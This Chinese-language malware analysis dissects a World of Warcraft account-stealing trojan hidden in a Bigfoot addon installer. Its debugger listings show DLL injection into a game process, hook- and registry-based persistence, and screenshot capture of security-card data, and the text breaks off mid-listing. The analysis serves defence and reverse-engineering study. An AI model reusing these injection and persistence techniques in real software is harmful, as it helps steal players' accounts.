魔兽盗号样本bigfoot1分析

主程序在temp目录下生成类似： 

"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope3.tmp"

"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope4.exe"

的文件，都调用SHELL32.ShellExecuteA运行。

其中第一个是正常的大脚程序，第二个是木马exe，大小：26.5KB，MD5：f8cb9dd43c052ee8c1b51e78485316b6 

ope4.exe有简单的壳，运行后释放：

"C:\WINDOWS\fOnts\eSEWZRdrSK3NeEJVy4.Ttf"

"C:\WINDOWS\system32\PERrGx5DkqSbQdwauCRQH.dll"

加载"C:\WINDOWS\system32\PERrGx5DkqSbQdwauCRQH.dll"，调用模块的导出函数："JUFndB4pARSJ"

0040136D FF7424 04 push dword ptr ss:[esp+4]
00401371 FF15 D8304000 call dword ptr ds:[<&kernel32.LoadLibrar>; kernel32.LoadLibraryA
00401377 85C0 test eax,eax
00401379 74 12 je short 1.0040138D
0040137B 68 9C414000 push 1.0040419C ; ASCII "JUFndB4pARSJ"
00401380 50 push eax
00401381 FF15 DC304000 call dword ptr ds:[<&kernel32.GetProcAdd>; kernel32.GetProcAddress

重点跟踪下这个导出函数，主要创建了两个线程：

72B05D86 FF15 0C71B072 call dword ptr ds:[72B0710C] ; kernel32.CreateThread

00E9FD54 00000000 |pSecurity = NULL
00E9FD58 00000000 |StackSize = 0
00E9FD5C 72B03E16 |ThreadFunction = PERrGx5D.72B03E16
00E9FD60 00394700 |pThreadParm = 00394700
00E9FD64 00000000 |CreationFlags = 0
00E9FD68 00394758 \pThreadId = 00394758

72B05D86 FF15 0C71B072 call dword ptr ds:[72B0710C] ; kernel32.CreateThread

00E9FD54 00000000 |pSecurity = NULL
00E9FD58 00000000 |StackSize = 0
00E9FD5C 72B03E42 |ThreadFunction = PERrGx5D.72B03E42
00E9FD60 00394700 |pThreadParm = 00394700
00E9FD64 00000000 |CreationFlags = 0
00E9FD68 0039474C \pThreadId = 0039474C

第一个线程的处理函数：

72B03E16 B8 B06DB072 mov eax,PERrGx5D.72B06DB0
72B03E1B E8 C02B0000 call PERrGx5D.72B069E0
72B03E20 51 push ecx
72B03E21 8D4D F0 lea ecx,dword ptr ss:[ebp-10]
72B03E24 E8 1EDAFFFF call PERrGx5D.72B01847
72B03E29 8365 FC 00 and dword ptr ss:[ebp-4],0
72B03E2D 8D4D F0 lea ecx,dword ptr ss:[ebp-10]
72B03E30 E8 60DFFFFF call PERrGx5D.72B01D95
72B03E35 68 B80B0000 push 0BB8
72B03E3A FF15 0471B072 call dword ptr ds:[72B07104] ; kernel32.Sleep
72B03E40 ^ EB EB jmp short PERrGx5D.72B03E2D

主要功能函数是72B01D95，跟进去分析：

72B06621 E8 96030000 call PERrGx5D.72B069BC ; jmp 到 kernel32.CreateToolhelp32Snapshot
72B06626 8BF0 mov esi,eax
72B06628 83FE FF cmp esi,-1
72B0662B 74 4D je short PERrGx5D.72B0667A
72B0662D 837D 08 00 cmp dword ptr ss:[ebp+8],0
72B06631 74 47 je short PERrGx5D.72B0667A
72B06633 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
72B06639 C785 D8FEFFFF 2>mov dword ptr ss:[ebp-128],128
72B06643 50 push eax
72B06644 56 push esi
72B06645 E8 7E030000 call PERrGx5D.72B069C8 ; jmp 到 kernel32.Process32First
72B0664A 85C0 test eax,eax
72B0664C 74 20 je short PERrGx5D.72B0666E
72B0664E FF75 0C push dword ptr ss:[ebp+C]
72B06651 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
72B06657 50 push eax
72B06658 FF55 08 call dword ptr ss:[ebp+8] ; ！！！！！
72B0665B 85C0 test eax,eax
72B0665D 74 0F je short PERrGx5D.72B0666E
72B0665F 8D85 D8FEFFFF lea eax,dword ptr ss:[ebp-128]
72B06665 50 push eax
72B06666 56 push esi
72B06667 E8 56030000 call PERrGx5D.72B069C2 ; jmp 到 kernel32.Process32Next
72B0666C ^ EB DC jmp short PERrGx5D.72B0664A
72B0666E 56 push esi
72B0666F FF15 D470B072 call dword ptr ds:[72B070D4] ; kernel32.CloseHandle

主要枚举查找指定进程，这里用的是Hash值，因此不好知道它要找到是什么进程，应该是个游戏进程名。

如果找到的话就用创建远程线程的方法把"C:\WINDOWS\system32\PERrGx5DkqSbQdwauCRQH.dll"注入到该进程中去：

72B06172 59 pop ecx
72B06173 40 inc eax
72B06174 50 push eax
72B06175 FF75 0C push dword ptr ss:[ebp+C]
72B06178 56 push esi
72B06179 53 push ebx
72B0617A FF15 A470B072 call dword ptr ds:[72B070A4] ; kernel32.WriteProcessMemory
72B06180 85C0 test eax,eax
72B06182 74 1B je short PERrGx5D.72B0619F
72B06184 8D45 F4 lea eax,dword ptr ss:[ebp-C]
72B06187 50 push eax
72B06188 57 push edi
72B06189 56 push esi
72B0618A FF75 FC push dword ptr ss:[ebp-4]
72B0618D 57 push edi
72B0618E 57 push edi
72B0618F 53 push ebx
72B06190 FF15 A070B072 call dword ptr ds:[72B070A0] ; kernel32.CreateRemoteThread
72B06196 6A FF push -1
72B06198 50 push eax
72B06199 FF15 9C70B072 call dword ptr ds:[72B0709C] ; kernel32.WaitForSingleObject
72B0619F 68 00800000 push 8000
72B061A4 57 push edi
72B061A5 56 push esi
72B061A6 53 push ebx
72B061A7 FF15 5C70B072 call dword ptr ds:[72B0705C] ; kernel32.VirtualFreeEx
72B061AD 5F pop edi
72B061AE 5E pop esi
72B061AF 5B pop ebx
72B061B0 C9 leave
72B061B1 C3 retn

计算指定进程的hash：

72B05DEC FF15 2070B072 call dword ptr ds:[72B07020] ; advapi32.CryptAcquireContextA
72B05DF2 85C0 test eax,eax
72B05DF4 74 3F je short PERrGx5D.72B05E35
72B05DF6 8D45 FC lea eax,dword ptr ss:[ebp-4]
72B05DF9 50 push eax
72B05DFA 56 push esi
72B05DFB 56 push esi
72B05DFC 68 03800000 push 8003
72B05E01 FF75 F8 push dword ptr ss:[ebp-8]
72B05E04 FF15 1C70B072 call dword ptr ds:[72B0701C] ; advapi32.CryptCreateHash
72B05E0A 85C0 test eax,eax
72B05E0C 74 55 je short PERrGx5D.72B05E63
72B05E0E 56 push esi
72B05E0F FF75 0C push dword ptr ss:[ebp+C]
72B05E12 FF75 08 push dword ptr ss:[ebp+8]
72B05E15 FF75 FC push dword ptr ss:[ebp-4]
72B05E18 FF15 1870B072 call dword ptr ds:[72B07018] ; advapi32.CryptHashData
72B05E1E 85C0 test eax,eax
72B05E20 75 17 jnz short PERrGx5D.72B05E39
72B05E22 56 push esi
72B05E23 FF75 F8 push dword ptr ss:[ebp-8]
72B05E26 FF15 1470B072 call dword ptr ds:[72B07014] ; advapi32.CryptReleaseContext
72B05E2C FF75 FC push dword ptr ss:[ebp-4]
72B05E2F FF15 1070B072 call dword ptr ds:[72B07010] ; advapi32.CryptDestroyHash
72B05E35 33C0 xor eax,eax
72B05E37 EB 36 jmp short PERrGx5D.72B05E6F
72B05E39 8D45 F4 lea eax,dword ptr ss:[ebp-C]
72B05E3C 56 push esi
72B05E3D 50 push eax
72B05E3E C745 F4 1000000>mov dword ptr ss:[ebp-C],10
72B05E45 FF75 10 push dword ptr ss:[ebp+10]
72B05E48 6A 02 push 2
72B05E4A FF75 FC push dword ptr ss:[ebp-4]
72B05E4D FF15 0C70B072 call dword ptr ds:[72B0700C] ; advapi32.CryptGetHashParam
72B05E53 85C0 test eax,eax
72B05E55 74 03 je short PERrGx5D.72B05E5A
72B05E57 6A 01 push 1
72B05E59 5F pop edi
72B05E5A FF75 FC push dword ptr ss:[ebp-4]
72B05E5D FF15 1070B072 call dword ptr ds:[72B07010] ; advapi32.CryptDestroyHash
72B05E63 56 push esi
72B05E64 FF75 F8 push dword ptr ss:[ebp-8]
72B05E67 FF15 1470B072 call dword ptr ds:[72B07014] ; advapi32.CryptReleaseContext

下面分析第二个线程72B03E42：
该线程主要两个作用，一是安装WH_GETMESSAGE，一是检查"Software\microsoft\windows\currentversion\Explorer\shellexecutehooks"
"{51716C09-6B08-4CCF-B526-718E912C0573}"是否存在，保证exe加载时都能加载该dll，这也是一种注入方式。

72B04084 FF15 9471B072 call dword ptr ds:[72B07194] ; USER32.SetWindowsHookExA

0109FD7C 00000003 |HookType = WH_GETMESSAGE
0109FD80 72B03F19 |Hookproc = PERrGx5D.72B03F19
0109FD84 72B00000 |hModule = 72B00000 (PERrGx5D)
0109FD88 00000000 \ThreadID = 0

0109FD78 72B09498 ASCII "Software\microsoft\windows\currentversion\Explorer\shellexecutehooks"
0109FD7C 0109FD9C ASCII "{51716C09-6B08-4CCF-B526-718E912C0573}"

上面的hook回调并没有什么核心代码，估计是为了注入dll使用的: 注入到explorer.exe

综上没有看出来盗号的代码，那应该是在dllMain里面了。

72B06B13 55 push ebp ; (initial cpu selection)

72B06B5B 57 push edi
72B06B5C 56 push esi
72B06B5D 53 push ebx
72B06B5E E8 62B2FFFF call PERrGx5D.72B01DC5

72B01ED3 FF15 6C70B072 call dword ptr ds:[72B0706C] ; kernel32.CreateMutexA

0006F44C 00000000 |pSecurity = NULL
0006F450 00000000 |InitialOwner = FALSE
0006F454 0006F464 \MutexName = "MTX:eSEWZRdrSK3NeEJVy4"

通过截图盗取密保：

72B068F5 53 push ebx
72B068F6 56 push esi
72B068F7 57 push edi
72B068F8 FF75 08 push dword ptr ss:[ebp+8]
72B068FB FF15 8C71B072 call dword ptr ds:[72B0718C] ; USER32.GetDC
72B06901 50 push eax
72B06902 8945 F0 mov dword ptr ss:[ebp-10],eax
72B06905 FF15 5070B072 call dword ptr ds:[72B07050] ; GDI32.CreateCompatibleDC
72B0690B 8945 EC mov dword ptr ss:[ebp-14],eax
72B0690E 8D45 DC lea eax,dword ptr ss:[ebp-24]
72B06911 50 push eax
72B06912 FF75 08 push dword ptr ss:[ebp+8]
72B06915 FF15 9071B072 call dword ptr ds:[72B07190] ; USER32.GetClientRect
72B0691B 8B7D E8 mov edi,dword ptr ss:[ebp-18]
72B0691E 8B75 E4 mov esi,dword ptr ss:[ebp-1C]
72B06921 2B7D E0 sub edi,dword ptr ss:[ebp-20]
72B06924 2B75 DC sub esi,dword ptr ss:[ebp-24]
72B06927 57 push edi
72B06928 56 push esi
72B06929 FF75 F0 push dword ptr ss:[ebp-10]
72B0692C FF15 3C70B072 call dword ptr ds:[72B0703C] ; GDI32.CreateCompatibleBitmap
72B06932 8B1D 4070B072 mov ebx,dword ptr ds:[72B07040] ; GDI32.SelectObject
72B06938 50 push eax
72B06939 FF75 EC push dword ptr ss:[ebp-14]
72B0693C FFD3 call ebx
72B0693E 8945 08 mov dword ptr ss:[ebp+8],eax
72B06941 33C0 xor eax,eax
72B06943 68 2000CC00 push 0CC0020
72B06948 50 push eax
72B06949 50 push eax
72B0694A FF75 F0 push dword ptr ss:[ebp-10]
72B0694D 57 push edi
72B0694E 56 push esi
72B0694F 50 push eax
72B06950 50 push eax
72B06951 FF75 EC push dword ptr ss:[ebp-14]
72B06954 FF15 4470B072 call dword ptr ds:[72B07044] ; GDI32.BitBlt
72B0695A FF75 08 push dword ptr ss:[ebp+8]
72B0695D FF75 EC push dword ptr ss:[ebp-14]
72B06960 FFD3 call ebx
72B06962 8D4D BC lea ecx,dword ptr ss:[ebp-44]
72B06965 8BF8 mov edi,eax
72B06967 E8 94A6FFFF call PERrGx5D.72B01000
72B0696C FF75 10 push dword ptr ss:[ebp+10]
72B0696F 8365 FC 00 and dword ptr ss:[ebp-4],0
72B06973 8D4D BC lea ecx,dword ptr ss:[ebp-44]
72B06976 FF75 0C push dword ptr ss:[ebp+C]
72B06979 57 push edi
72B0697A E8 33A7FFFF call PERrGx5D.72B010B2
72B0697F FF75 08 push dword ptr ss:[ebp+8]
72B06982 8B35 4870B072 mov esi,dword ptr ds:[72B07048] ; GDI32.DeleteObject
72B06988 8BD8 mov ebx,eax
72B0698A FFD6 call esi
72B0698C 57 push edi
72B0698D FFD6 call esi
72B0698F FF75 F0 push dword ptr ss:[ebp-10]
72B06992 8B35 4C70B072 mov esi,dword ptr ds:[72B0704C] ; GDI32.DeleteDC
72B06998 FFD6 call esi

72B0104E 837E 1C 00 cmp dword ptr ds:[esi+1C],0
72B01052 75 59 jnz short PERrGx5D.72B010AD
72B01054 68 B490B072 push PERrGx5D.72B090B4 ; ASCII "gdiplus.dll"
72B01059 FF15 C870B072 call dword ptr ds:[72B070C8] ; kernel32.LoadLibraryA
72B0105F 85C0 test eax,eax
72B01061 8946 1C mov dword ptr ds:[esi+1C],eax
72B01064 74 47 je short PERrGx5D.72B010AD
72B01066 57 push edi
72B01067 8B3D CC70B072 mov edi,dword ptr ds:[72B070CC] ; kernel32.GetProcAddress
72B0106D 68 A490B072 push PERrGx5D.72B090A4 ; ASCII "GdiplusStartup"
72B01072 50 push eax
72B01073 FFD7 call edi
72B01075 68 8890B072 push PERrGx5D.72B09088 ; ASCII "GdipCreateBitmapFromHBITMAP"
72B0107A 8946 18 mov dword ptr ds:[esi+18],eax
72B0107D FF76 1C push dword ptr ds:[esi+1C]
72B01080 FFD7 call edi
72B01082 68 7490B072 push PERrGx5D.72B09074 ; ASCII "GdipDisposeImage"
72B01087 8946 14 mov dword ptr ds:[esi+14],eax
72B0108A FF76 1C push dword ptr ds:[esi+1C]
72B0108D FFD7 call edi
72B0108F 68 6090B072 push PERrGx5D.72B09060 ; ASCII "GdipSaveImageToFile"
72B01094 8946 10 mov dword ptr ds:[esi+10],eax
72B01097 FF76 1C push dword ptr ds:[esi+1C]
72B0109A FFD7 call edi
72B0109C 68 5090B072 push PERrGx5D.72B09050 ; ASCII "GdiplusShutdown"